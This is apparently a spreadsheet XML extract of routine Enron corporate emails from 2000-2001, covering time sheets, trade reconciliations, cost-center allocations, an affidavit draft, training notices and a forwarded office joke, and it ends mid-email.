    <t>frozenset({'dl-erc@enron.com'})</t>
  </si>
  <si>
    <t>ERC On The Run 10.15.01</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 _x000D_
_x000D_
&lt;Embedded Microsoft Word Document&gt;</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brandee.jackson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'richard.pinion@enron.com', 'lisa.kinsey@enron.com', 'mary.poorman@enron.com', 'kirk.lenart@enron.com', 'kelly.loocke@enron.com', 'tom.acton@enron.com', 'alvin.thompson@enron.com', 'jessica.white@enron.com', 'jacqueline.adams@enron.com', 'joe.casas@enron.com', 'kathryn.bussell@enron.com', 'souad.mahmassani@enron.com', 'lia.halstead@enron.com', 'daren.farmer@enron.com', 'scott.loving@enron.com', 'shannon.groenewold@enron.com', 'daniel.lisk@enron.com', 'joann.collins@enron.com', 'kevin.brady@enron.com', 'suzanne.christiansen@enron.com', 'donna.greif@enron.com', 'darren.espey@enron.com', 'jason.williams@enron.com', 'tamara.carter@enron.com', 'brenda.fletcher@enron.com', 'cora.pendergrass@enron.com', 'chris.ordway@enron.com', 'kimberly.olinger@enron.com', 'steve.gillespie@enron.com', 'edward.terry@enron.com', 'jeanne.wukasch@enron.com', 'carolyn.george@enron.com', 'stacey.brewer@enron.com', 'shahnaz.lakho@enron.com', 'clarissa.garcia@enron.com', 'michael.olsen@enron.com', 'jan.sutherland@enron.com', 'robert.allwein@enron.com', 'mark.mccoy@enron.com', 'robert.superty@enron.com', 'teresa.mcomber@enron.com', 'robert.cotten@enron.com', 'suzanne.calcagno@enron.com', 'shanna.boudreaux@enron.com', 'ted.evans@enron.com', 'meredith.homco@enron.com', 'charles.muzzy@enron.com', 'jesse.villarreal@enron.com', 'victor.lamadrid@enron.com', 'david.marye@enron.com', 'sabrae.zajac@enron.com', 'natalie.baker@enron.com', 'sabra.dinari@enron.com', 'christina.sanchez@enron.com', 'cynthia.franklin@enron.com', 'jason.wolfe@enron.com', 'diane.cook@enron.com', 'jackie.young@enron.com', 'hillary.mack@enron.com', 'liz.bellamy@enron.com', 'george.smith@enron.com', 'mark.schrab@enron.com', 'tracy.wood@enron.com', 'margie.straight@enron.com', 'wes.dempsey@enron.com', 'patti.sullivan@enron.com', 'shelly.mendel@enron.com', 'clem.cernosek@enron.com', 'tammy.gilmore@enron.com'})</t>
  </si>
  <si>
    <t>Time Sheet Reminder</t>
  </si>
  <si>
    <t xml:space="preserve">     Just a reminder that all time sheets are due by 3:00 today, Monday, _x000D_
April 16th._x000D_
_x000D_
     If you need assistance entering your time, please call Alex or Brandee._x000D_
_x000D_
     Thank You!</t>
  </si>
  <si>
    <t>Sat, 18 Mar 2000 13:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'haysletr@flash.net'})</t>
  </si>
  <si>
    <t>frozenset({'rhaysle@enron.com'})</t>
  </si>
  <si>
    <t>[Fwd: Dead horses]</t>
  </si>
  <si>
    <t>-------- Original Message --------_x000D_
Subject: Dead horses_x000D_
Date: Sat, 18 Mar 2000 20:26:41 -0600_x000D_
From: "Virginia Dollahite" &lt;virginia@teleometrics.com&gt;_x000D_
To: "Virginia Dollahite" &lt;virginia@teleometrics.com&gt;_x000D_
_x000D_
Dakota tribal wisdom says that when you discover you are riding a dead_x000D_
horse,  the best strategy is to dismount.  However, in managing any_x000D_
business_x000D_
we often try other strategies with dead horses, including the following:_x000D_
_x000D_
 1.  Buying a stronger whip._x000D_
_x000D_
 2.  Changing riders._x000D_
_x000D_
 3.  Saying things like "This is the way we always have ridden this_x000D_
horse."_x000D_
_x000D_
 4.  Appointing a committee to study the horse._x000D_
_x000D_
 5.  Arranging to visit other sites to see how they ride dead horses._x000D_
_x000D_
 6.  Increasing the standards to ride dead horses._x000D_
_x000D_
 7.  Appointing a "tiger team" to revive the dead horse._x000D_
_x000D_
 8.  Creating a training session to increase our riding ability._x000D_
_x000D_
 9.  Comparing the state of dead horses in today's environment._x000D_
_x000D_
 10. Changing the requirements, declaring that "This horse is not dead."_x000D_
_x000D_
 11. Hiring contractors to ride the dead horse._x000D_
_x000D_
 12. Harnessing several dead horses together for increased speed._x000D_
_x000D_
 13. Declaring that "No horse is too dead to beat."_x000D_
_x000D_
 14. Providing additional funding to increase the horse's performance._x000D_
_x000D_
 15. Doing a Cost Analysis Study to see if contractors can ride it_x000D_
cheaper._x000D_
_x000D_
 16. Purchasing a product to make dead horses run faster._x000D_
_x000D_
 17. Declaring the horse is "better, faster and cheaper" dead._x000D_
_x000D_
 18. Forming a quality circle to find uses for dead horses._x000D_
_x000D_
19. Revisiting the performance requirements for horses._x000D_
_x000D_
 20. Saying this horse was procured with cost as an independent_x000D_
variable._x000D_
_x000D_
 21. Promoting the dead horse to a supervisory position._x000D_
_x000D_
 22. .Involving employees in resuscitating the horse._x000D_
_x000D_
 23. Re-engineering the horse into a dead camel._x000D_
_x000D_
 24. Appointing a Kaizen team to remove three redundant legs from the_x000D_
  horse._x000D_
_x000D_
 25. Having the horse ISO certified as dead._x000D_
_x000D_
 26. Asking the Union to cooperate with Management in propping up the_x000D_
  horse._x000D_
_x000D_
 27. Using the equity in the saddle to finance the purchase of a dead_x000D_
cow._x000D_
_x000D_
28. Splitting the horse into two smaller pieces to increase agility and_x000D_
   speed._x000D_
_x000D_
 29. Threatening to kill the horse again if it doesn't get up and try_x000D_
  harder._x000D_
_x000D_
 30. Sending the herd owner off to Executive Rider Development._x000D_
_x000D_
 31. Mapping the death process to determine potential improvements._x000D_
_x000D_
 32. Leveraging the value of the horse to acquire a glue factory._x000D_
_x000D_
 33. Shipping the horse to China to reduce the cost of riders._x000D_
_x000D_
 34. Investing in an IT overhaul to support a Resuscitation Relational_x000D_
   Database_x000D_
_x000D_
 35. Launching an IPO for DeadHorse.com_x000D_
_x000D_
 36. Offering a buy-out package to riders 55 and older to reduce the_x000D_
 horse's burden.</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 10:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.beck@enron.com'})</t>
  </si>
  <si>
    <t>Re: Update</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for forwarding mail to me.  I apologize for the inconvenience of _x000D_
this.  My current e:mail address is sally.beck@enron.com, as suggested within _x000D_
the past few months by the technology group that all addresses use the long _x000D_
name.   HOWEVER, my e:mail address prior to that was sbeck@ect.enron.com.  _x000D_
That was printed on my business cards, many of which are still in circulation _x000D_
I am sure.  When ECT became ENA, I changed my e:mail address to drop the ect _x000D_
reference and to use my long name rather than sbeck.  So I can see why you _x000D_
would receive my mail on occassion if someone is either making an educated _x000D_
guess on the address or referencing my old card.  SInce there are at least 2 _x000D_
sbeck's here, have you thought about adopting use of your long name address _x000D_
rather than the shorter version to help in further differentiating between _x000D_
us?   That might help eliminate confusion going forward.  </t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 02:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Rockets</t>
  </si>
  <si>
    <t>no thanks.  what aabout the happy hour with the hottie?</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 10:20:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({"workman-rodriguez'.'wyndi@enron.com", 'virginia.thompson@enron.com'})</t>
  </si>
  <si>
    <t>RE: July 2001</t>
  </si>
  <si>
    <t>All days listed below have been corrected.  I come up with different totals for 7/13 &amp; 7/14._x000D_
_x000D_
7/13 = $ 55079.10_x000D_
7/14 = $ 48932.54_x000D_
_x000D_
Please re-check your daily totals.  My month totals for July are as follows:_x000D_
_x000D_
Purchases:	$ 2,573,267.32_x000D_
Sales:	$ 2,543,124.12_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Diana_x000D_
_x000D_
-----Original Message-----_x000D_
From: WYNDI Workman-Rodriguez [mailto:Wyndi_Workman-Rodriguez@pgn.com]_x000D_
Sent: Thursday, August 30, 2001 4:50 PM_x000D_
To: DScholt@enron.com; Thompson, Virginia_x000D_
Cc: Anne Snyder; BILL CASEY; Shari Johnson_x000D_
Subject: July 2001_x000D_
_x000D_
_x000D_
I know I'm kind of bouncing around, but since we have help, we're working on whatever we can.  The following is what has been found for July 2001, then we should be good:_x000D_
_x000D_
7/9:  Deal #676569.1 - needs an adder of $0.10, currently shows none (PGE system).  Our day total for our sales is $82,439.88_x000D_
_x000D_
7/13 &amp; 7/14:  Deal #683299.1 - needs correct index (not NF) of OFF - - day total 7/13 = $55,054.30 &amp; 7/14 = $48,907.74_x000D_
_x000D_
7/23:  Deal #695822.1 - needs correct index of OFF (day tot=$184,848.56)_x000D_
_x000D_
7/24:  Deal #697589.1 - needs correct index of OFF (day tot=$56,573.22)_x000D_
_x000D_
7/25:  Deal #700116.1 - same as 7/24 (day total = $48,997.04)_x000D_
_x000D_
Totals for PGE Sales:   $2,573,217.72_x000D_
Totals for PGE Purch   $2,543,124.12_x000D_
_x000D_
AND THAT'S IT !!!!  _x000D_
_x000D_
Wyndi &amp; Anne</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 00:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Comnes Affidavit Revised</t>
  </si>
  <si>
    <t xml:space="preserve">Alan --_x000D_
_x000D_
Here are my comments with redline.  Some formatting and some changes._x000D_
_x000D_
Thanks._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Alan Comnes@ECT_x000D_
	11/21/2000 09:09 PM_x000D_
		 _x000D_
		 To: James D Steffes/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Steven J Kean/NA/Enron@Enron, Paul _x000D_
Kaufman/PDX/ECT@ECT, rcarroll@bracepatt.com, kcurry@bracepatt.com, Tim _x000D_
Belden/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, Jeff Richter/HOU/ECT@ECT, _x000D_
Dennis Benevides/HOU/EES@EES, Jubran Whalan/HOU/EES@EES, Neil _x000D_
Bresnan/HOU/EES@EES, Susan J Mara/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Mona L Petrochko/NA/Enron@Enron, Alan _x000D_
Comnes/PDX/ECT@ECT, Sarah Novosel/Corp/Enron@Enron, Christopher F _x000D_
Calger/PDX/ECT@ECT, David Parquet/SF/ECT@ECT, cfergus@brobeck.com, _x000D_
lanai.wolfe@enron.com, lanaiwolfe@enron.com, Mary Hain/HOU/ECT@ECT_x000D_
		 cc: Marcia A Linton/NA/Enron@Enron, Ginger Dernehl/NA/Enron@Enron, Maureen _x000D_
McVicker/NA/Enron@Enron, Debra Davidson/PDX/ECT@ECT, Joseph _x000D_
Alamo/NA/Enron@Enron, Bernadette Hawkins/Corp/Enron@ENRON_x000D_
		 Subject: Comnes Affidavit Revised_x000D_
_x000D_
Here's the latest.   If you make comments, please make them on this version._x000D_
_x000D_
Fax comments to BOTH 530-327-9235 (yes, "530")  and 503-464-3740 or email the _x000D_
comments to AComnes@enron.com with redline/strikout turned on._x000D_
_x000D_
Kim Curry, please take a formatting pass if you can first thing Wed and email _x000D_
back to me when done._x000D_
_x000D_
Alan Comnes_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 07:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: BuySideDirect</t>
  </si>
  <si>
    <t xml:space="preserve">Jason:  Before we designate specific individuals, let's think this through.  _x000D_
A "generic" address may be more appropriate.  Which agreement did we recently _x000D_
sign with reference to the "Documentation Desk"?  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 08/15/2000 02:43 PM -----_x000D_
_x000D_
	Mike Fowler@ENRON_x000D_
	08/15/2000 11:54 AM_x000D_
		_x000D_
		 To: "JASON PETERS" &lt;PETEJ@andrews-kurth.com&gt;_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: Re: BuySideDirect_x000D_
_x000D_
Jason, I suggest that Madhur Dayal be designated initially at the person to _x000D_
receive notification of material changes to agreements.  We should retain the _x000D_
ability to change this contact person._x000D_
_x000D_
Sara, as noted in my earlier email to you and Sheila Glover, we should ensure _x000D_
that agreements with online trading platforms allow for trading by ENA, ECT _x000D_
Investments and EnronCredit.com.   _x000D_
_x000D_
Thanks._x000D_
_x000D_
Mike_x000D_
713-853-9990_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"JASON PETERS" &lt;PETEJ@andrews-kurth.com&gt; on 08/14/2000 11:29:27 AM_x000D_
To: &lt;mike.fowler@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: BuySideDirect_x000D_
_x000D_
_x000D_
Mike,_x000D_
_x000D_
Who should notices be addressed to?_x000D_
_x000D_
Jason_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 07:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.garten@yale.edu'})</t>
  </si>
  <si>
    <t>Panel on Value Creation in the New Economy</t>
  </si>
  <si>
    <t xml:space="preserve"> Dear Ken,_x000D_
_x000D_
 As you know our first meeting will be on Tuesday, May 23 at 4:30_x000D_
p.m.  Pete Peterson, chairman of the Blackstone Group, has kindly agreed to_x000D_
host it in his conference room. The address is:_x000D_
_x000D_
 The Blackstone Group_x000D_
 345 Park Avenue (between 51st and 52nd)_x000D_
 31st floor_x000D_
 (212)583-5000._x000D_
_x000D_
 I know that some plans have changed since we first set the meeting,_x000D_
with some people being away and others having cancelled trips, so could you_x000D_
please reconfirm whether or not you will be able to attend?_x000D_
_x000D_
 Sometime next week, we will be sending you an agenda and a_x000D_
background paper that focuses on the issues we propose to discuss. I greatly_x000D_
appreciate all the help members of the panel have given Tim Koller and me._x000D_
As you know, Tim Koller is the McKinsey&amp;Co. partner who kindly prepared the_x000D_
draft outline we originally sent around.  He will also be preparing the_x000D_
paper you will receive shortly._x000D_
_x000D_
 I am attaching the final list of panel members. Please do look it_x000D_
over. There are some significant additions: Kenneth Lay of Enron, Rob Glaser_x000D_
of RealNetworks, Len Baker of Sutter Hill Ventures,  Dennis Powell of Cisco._x000D_
_x000D_
_x000D_
 I look forward to your rsvp, and hopefully to seeing you on May 23._x000D_
_x000D_
 Best regards,_x000D_
 Jeff_x000D_
_x000D_
  &lt;&lt;SEC Panel Members.doc&gt;&gt;_x000D_
_x000D_
 - SEC Panel Members.doc</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2001 07:00:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Ranger docs</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Symms, Neal  _x000D_
Sent:	Tuesday, July 24, 2001 6:39 AM_x000D_
To:	Stokley, Chris_x000D_
Subject:	Ranger docs_x000D_
_x000D_
Chris,_x000D_
_x000D_
Here's something to get you started.  Included is the original work request, #1692, which was our initial request for data from them.  It has been trimmed down somewhat so that we could get something within the timeframe we wanted.  Their latest response is in the ROM file.  The file "Ranger0712.zip" has the latest presentation given to us by CSC regarding this project._x000D_
_x000D_
Neal_x000D_
_x000D_
_x000D_
_x000D_
 - CES1692.ROM.RangerIteration I 071901.doc _x000D_
  _x000D_
 - Ranger0712.zip </t>
  </si>
  <si>
    <t>Thu, 31 May 2001 22:27:28 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Do you do expense reports and have not taken the training?_x000D_
_x000D_
Expense Management System (XMS) - Cost: $135_x000D_
         June 4th		8:30am-11:30am	EB564	_x000D_
June 19th	1:00pm-4:00pm		  EB564_x000D_
_x000D_
The Expense Management System (XMS) is a tool used to electronically submit your expense report for approval and payment through the Enron Intranet. It is user friendly, accurate and less labor intensive for you and the accounting staff.  This system will help you report your travel and entertainment expenses._x000D_
_x000D_
You will learn how to:_x000D_
E	Create New Expense Reports_x000D_
E	Enter Cash Expense Receipts_x000D_
E	Adding Company Card Entries_x000D_
E	Enter Personal Car Mileage_x000D_
E	Foreign Currency Translation_x000D_
E	Reimbursement Method_x000D_
E	Designating your Approving Manager_x000D_
E	Designating your Administrative Assistant_x000D_
E	Submitting Your Expense Report_x000D_
E	Reviewing your Expense Report_x000D_
E	And Much More..._x000D_
_x000D_
Please login and enroll through the InvestInMe website, http://www.corptraining.com/index.cfm?company=enron.  If you have any questions, please call 713 853-1816._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:08:16 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Out on Tuesday</t>
  </si>
  <si>
    <t>No problem.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reitmeyer, Jay  _x000D_
Sent:	Monday, November 26, 2001 11:32 AM_x000D_
To:	Grigsby, Mike_x000D_
Subject:	Out on Tuesday_x000D_
_x000D_
I need to take a few hours off Tuesday afternoon after lunch.  I have some family business to attend to.  I should only be gone 2 hours or so.  Susan will be here to handle EOL.  Let me know if you have a problem with this.  I know I need to be here, but this is something I have to take care of and this was the only time I could schedule it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jay</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CAR</t>
  </si>
  <si>
    <t>Any last words for your car before I leave for my nap??  Don't worry I'm a _x000D_
"safe driver."  I'll sleep a little extra for you.  _x000D_
_x000D_
How's everything going this morning?</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'holly.heath@enron.com'})</t>
  </si>
  <si>
    <t>Re: Revised Allocation %'s - October</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know what PC 12667 is.  But, in the attached spreadsheet, my cost _x000D_
center is grouped with Risk Management.  I now report to Bob Hall, so CC _x000D_
105633 should be reported with the other Logistics groups._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Holly Heath@ENRON_x000D_
11/02/2000 04:23 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Revised Allocation %'s - October  _x000D_
_x000D_
Hi Daren,_x000D_
_x000D_
I'm afraid I don't understand what you are asking me to do.  Do you mean that _x000D_
you want CC 105633 moved to Logistics PC 12667.  If so, there is a _x000D_
complicated process in order to do so.  Has someone else made this request or _x000D_
is this your own?  Please explain._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Holly_x000D_
3-5843  _x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer@ECT_x000D_
11/02/2000 03:34 PM_x000D_
To: Holly Heath/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Revised Allocation %'s - October  _x000D_
_x000D_
Please move my group from Risk to Logisitcs._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Irena D Hogan                           11/02/2000 03:21 PM_x000D_
	_x000D_
_x000D_
To: Dutch Quigley/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, William Kelly/HOU/ECT@ECT, _x000D_
Daren J Farmer/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Revised Allocation %'s - October_x000D_
_x000D_
Please read below and comply as directed below._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Irena_x000D_
---------------------- Forwarded by Irena D Hogan/HOU/ECT on 11/02/2000 03:16 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Holly Heath@ENRON_x000D_
11/02/2000 02:17 PM_x000D_
To: Robert Superty/HOU/ECT@ECT,  Brenda F Herod/HOU/ECT@ECT, Leslie _x000D_
Reeves/HOU/ECT@ECT, Shona Wilson/NA/Enron@Enron, Sheila Glover/HOU/ECT@ECT, _x000D_
Maria Sandoval/HOU/ECT@ECT, Sheri Thomas/HOU/ECT@ECT, D Todd _x000D_
Hall/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT, Lisa B Cousino/HOU/ECT@ECT, _x000D_
Sally Beck/HOU/ECT@ECT, Stacey W White/HOU/ECT@ECT, Diane H Cook/HOU/ECT@ECT, _x000D_
Michael E Moscoso/HOU/ECT@ECT, Eugenio Perez/HOU/ECT@ECT, Jefferson D _x000D_
Sorenson/HOU/ECT@ECT_x000D_
cc: Heather Choate/HOU/ECT@ECT, Irena D Hogan/HOU/ECT@ECT, Chantelle _x000D_
Villanueva/HOU/ECT@ECT, Yvette G Connevey/Corp/Enron@ENRON, Mary _x000D_
Comello/Corp/Enron@Enron, Lisa Shoemake/HOU/ECT@ECT, Maria _x000D_
Sandoval/HOU/ECT@ECT, Kelly Templeton/Corp/Enron@ENRON, Lynn _x000D_
Tippery/HOU/ECT@ECT, Marvia Jefferson/HOU/ECT@ECT, Patti _x000D_
Thompson/HOU/ECT@ECT, Julissa Marron/Corp/Enron@ENRON, Yolanda _x000D_
Ford/HOU/ECT@ECT, Adrial Boals/Corp/Enron@Enron _x000D_
Subject: Revised Allocation %'s - October_x000D_
_x000D_
Attached is a revised allocation file for October.  Please note that the _x000D_
format of this file has been changed to reflect the new team reporting list.  _x000D_
Also, "Global Markets" and "Industrial Markets" have been broken out for _x000D_
billing purposes.  If you have cost centers that are allocating to either of _x000D_
these teams, please provide a breakdown of those percentages by Monday, _x000D_
November 6th._x000D_
_x000D_
All other allocations are due by end of day today._x000D_
_x000D_
I have also included the team reporting list that is currently in use until _x000D_
the end of 2001. _x000D_
_x000D_
Thank you for your help.  Please call if you have any additional questions. _x000D_
_x000D_
Holly_x000D_
3-5843_x000D_
_x000D_
_x000D_
          _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joe.kishkill@enron.com'})</t>
  </si>
  <si>
    <t>Joe_x000D_
_x000D_
A couple of questions._x000D_
_x000D_
1.  Where did the Gas Trading P/L derive from this month._x000D_
_x000D_
2.  How are you coming on the position reports we discussed._x000D_
_x000D_
Talk to you soon._x000D_
_x000D_
John Lavorato</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Constellation Cal Px trades</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, any news on these Constellation Cal PX trades?  _x000D_
Thanks,_x000D_
Melissa_x000D_
---------------------- Forwarded by Melissa Ann Murphy/HOU/ECT on 04/17/2001 _x000D_
09:06 AM ---------------------------_x000D_
   Kate Symes                03/30/2001 12:57 PM_x000D_
_x000D_
To: Melissa Ann Murphy/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Constellation Cal Px trades  _x000D_
_x000D_
I just talked to Bob, and I don't know if he's responded yet, but I thought _x000D_
I'd fill you in anyway. He's been talking to his contact at Constellation _x000D_
about changing these deals over, but hasn't received a concrete answer yet. _x000D_
I've reminded him and he said he WILL talk to the guy and resolve it today. _x000D_
I'll keep on it, and let you know when these deals have been changed._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Melissa Ann Murphy_x000D_
03/29/2001 11:13 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Constellation Cal Px trades_x000D_
_x000D_
Hello, I hate to bug you with this.  Whenever you can spare a second would _x000D_
you ask Bob about this?  I am afraid it is going to slip through the cracks._x000D_
_x000D_
Thanks for your help!_x000D_
Melissa_x000D_
---------------------- Forwarded by Melissa Ann Murphy/HOU/ECT on 03/29/2001 _x000D_
12:07 PM ---------------------------_x000D_
_x000D_
_x000D_
Melissa Ann Murphy_x000D_
03/26/2001 10:34 AM_x000D_
To: Robert Badeer/HOU/ECT@ECT_x000D_
cc: Kate Symes/PDX/ECT@ECT _x000D_
Subject: Constellation Cal Px trades_x000D_
_x000D_
Hi Bob, I was wondering if you have contacted Constellation about the 6 _x000D_
trades that are in the system with the Cal Px as the index price.  All of _x000D_
these trades start flowing in July of this year._x000D_
_x000D_
The deal numbers are as follows:_x000D_
_x000D_
453152.01_x000D_
453175.01_x000D_
453294.01_x000D_
462109.01_x000D_
471888.01_x000D_
471889.01_x000D_
_x000D_
Let me know if Constellation agrees to change these deals to the Dow Jones so _x000D_
I can send a letter for them to sign._x000D_
_x000D_
Thanks,_x000D_
Melissa_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 10:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'barbara.hueter@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'carmen.perez@enron.com', 'margo.reyna@enron.com', 'mona.petrochko@enron.com', 'eric.benson@enron.com', 'xi_xi@enron.net', 'marchris.robinson@enron.com', 'mike.dahlke@enron.com', 'ginger.dernehl@enron.com', 'richard.shapiro@enron.com', 'allison.navin@enron.com', 'scott.bolton@enron.com', 'karen.huang@enron.com', 'donald_lassere@enron.net', 'lara.leibman@enron.com', 'susan.landwehr@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'maureen.mcvicker@enron.com', 'ricardo.charvel@enron.com', 'john.neslage@enron.com'})</t>
  </si>
  <si>
    <t>KDW White Paper</t>
  </si>
  <si>
    <t>_x000D_
This is an excellent summary of competition in the local loop prepared by _x000D_
Kelley, Drye and Warren._x000D_
_x000D_
_x000D_
_x000D_
 - KDWWhitePaper.doc</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 01:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'larry.jester@enron.com', 'don.baughman@enron.com', 'terry.moore@enron.com', 'juan.hernandez@enron.com', 'kayne.coulter@enron.com'})</t>
  </si>
  <si>
    <t>Transmission Rates</t>
  </si>
  <si>
    <t>Hey guys,_x000D_
_x000D_
I've updated the transmission rates table for May - here is the location:_x000D_
_x000D_
M:\Electric\East Volume Mgmt\Transmission\Transmission Rates_x000D_
_x000D_
If there is a better spot for this to make it more accessible just let me _x000D_
know and I can put a copy of it whereever._x000D_
_x000D_
Couple of other trends I've noticed that hopefully can be corrected..._x000D_
_x000D_
First Energy transmission is now and has been for a while under the _x000D_
counterparty American Transmission Systems, Inc. (ATSI)_x000D_
Duke transmission should be under the Duke counterparty Duke Electric _x000D_
Transmission (DUKEELETRA)_x000D_
Georgia's ancillary service charges have changed although their website has _x000D_
not be updated - price changed from $2.57 to $2.49_x000D_
_x000D_
Please pass this along to the rest of the group, if any of you have any _x000D_
questions or suggestions - don't hesitate to call._x000D_
_x000D_
Thanks,_x000D_
Michael_x000D_
_x000D_
AOL IM - mejake007_x000D_
steno - 635_x000D_
x35098</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 02:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant.masson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tanya.tamarchenko@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Ben Zhang: Nuts!</t>
  </si>
  <si>
    <t xml:space="preserve">I also heard from Joe Toussaint that Ben's boss counter-offered with a bump _x000D_
in salary._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Grant Masson/HOU/ECT on 09/18/2000 09:24 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Zhang, Ben" &lt;bzhang@cinergy.com&gt; on 09/18/2000 07:58:58 AM_x000D_
To: Grant.Masson@enron.com_x000D_
cc:  _x000D_
Subject: Thanks_x000D_
_x000D_
_x000D_
Dear Mr. Masson:_x000D_
_x000D_
Thank you very much for offering me an opportunity to work in your group._x000D_
However because of family reasons, I have to regrettably inform you that I_x000D_
will not be able to make the move at this time. It has been a great_x000D_
experience working  with you on this process, and I greatly appreciate your_x000D_
help._x000D_
_x000D_
I realized that this would have been a great opportunity for me, and I thank_x000D_
you very much for everything. I hope you will still consider me for a_x000D_
position in the future._x000D_
_x000D_
Sincerely,_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 98-6892 for 3/15/2000 and 3/23/2000</t>
  </si>
  <si>
    <t xml:space="preserve">Ray Calles (TETCO) told me today that he will put the OBA in the mail either _x000D_
tonight or first thing Monday._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
-Jackie-_x000D_
3-9497_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
03/31/2000 10:46 AM_x000D_
To: Jackie Young/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: 98-6892 for 3/15/2000 and 3/23/2000  _x000D_
_x000D_
Don't we have an OBA at this point now?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
Jackie Young_x000D_
03/31/2000 09:15 AM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 98-6892 for 3/15/2000 and 3/23/2000_x000D_
_x000D_
Daren,_x000D_
_x000D_
I know it's first of the month but the above meter has flow for 3/15 (71 _x000D_
dec.) and 3/23 (35 dec.) but the deal (Sitara #213005) doesn't cover these _x000D_
two days._x000D_
_x000D_
